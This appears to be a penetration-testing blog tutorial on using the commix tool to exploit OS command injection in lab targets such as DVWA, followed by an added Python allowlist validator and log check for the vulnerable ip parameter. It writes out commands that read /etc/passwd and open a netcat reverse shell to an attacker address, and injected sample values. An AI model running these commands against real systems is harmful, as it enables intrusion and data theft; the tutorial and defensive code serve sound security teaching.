Hello everyone. Most readers here already know what OS command injection is and what its consequences are. We can test for it manually by checking parameters and trying multiple payloads, or automatically using tools such as Burp Suite and commix.
Here we are going to talk about a tool named commix (short for [comm]and [i]njection e[x]ploiter), which pentesters commonly use to test for OS command injection automatically.
Commix comes preinstalled in many penetration testing distros, or it can be downloaded from GitHub: https://github.com/commixproject/commix. In my case, I downloaded it from GitHub.
python commix.py --help

For this demonstration you can use Metasploitable-2, which includes DVWA and Web for Pentester.
python commix.py -u "http://192.168.43.58/commendexec/example1.php?ip=127.0.0.1"

As the commix help output shows, there are various options we can use to perform different tasks.
python commix.py -u "http://192.168.43.58/commendexec/example1.php?ip=127.0.0.1" --hostname


If we want to read a file located on the vulnerable target system, we can easily do that too.
python commix.py -u "http://192.168.43.58/commendexec/example1.php?ip=127.0.0.1" --file-read=/etc/passwd

If we want a reverse shell, we can usually get one using netcat; we can also upload a PHP or Python backdoor and execute it with a command.
python commix.py -u "http://192.168.43.58/commendexec/example1.php?ip=127.0.0.1" --os-cmd="nc -e /bin/sh 192.168.X.X 4444"

We need to listen with nc on the chosen port to get the shell.
nc -lvp 4444

For a POST request we need to supply some more options, such as the cookie and data parameters with their values. First we need to get those values, for which we can use any proxy tool. Here I used Burp proxy to capture the request and got the cookie as well as the ip parameter.

python commix.py -u "http://192.168.43.58/dvwa/vulnerabilities/exec/" --cookie="cookie value" --data="value"
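
The defensive counterpart to the tests above, as an added example (not code from the original post or from the commix project): an allowlist check for the ip parameter that commix targets, used both to build a shell-free ping call and to flag logged requests whose ip value is not a literal address. It assumes the vulnerable page passes ip to ping; the function names and the sample request lines are constructed for illustration.

```python
import ipaddress
from urllib.parse import urlsplit, parse_qs

# Constructed request lines in access-log style (not captured from a real server).
SAMPLE_REQUESTS = [
    "GET /commendexec/example1.php?ip=127.0.0.1 HTTP/1.1",
    "GET /commendexec/example1.php?ip=127.0.0.1%3Bhostname HTTP/1.1",
    "GET /commendexec/example1.php?ip=127.0.0.1%7Ccat%20/etc/passwd HTTP/1.1",
    "GET /commendexec/example1.php?ip=192.168.43.58 HTTP/1.1",
]

def is_valid_ip(value):
    """Allowlist check: accept only a literal IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

def ping_argv(value):
    """Build an argument vector for ping; the value never reaches a shell."""
    if not is_valid_ip(value):
        raise ValueError("ip parameter is not a literal IP address")
    # Intended for subprocess.run(argv) with the default shell=False.
    return ["ping", "-c", "2", value]

def flag_requests(lines, param="ip"):
    """Return (request line, decoded value) pairs where param fails the allowlist."""
    flagged = []
    for line in lines:
        parts = line.split(" ")
        if len(parts) < 2:
            continue  # not a well-formed request line
        query = urlsplit(parts[1]).query
        # parse_qs percent-decodes, so encoded separators such as %3B are seen as ';'
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            if not is_valid_ip(value):
                flagged.append((line, value))
    return flagged

if __name__ == "__main__":
    for line, value in flag_requests(SAMPLE_REQUESTS):
        print("suspicious:", repr(value), "<-", line)
    print("safe argv:", ping_argv("127.0.0.1"))
```

Validating against the expected type rejects every appended command without needing a list of bad characters, and the same check doubles as a log triage rule for this endpoint.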
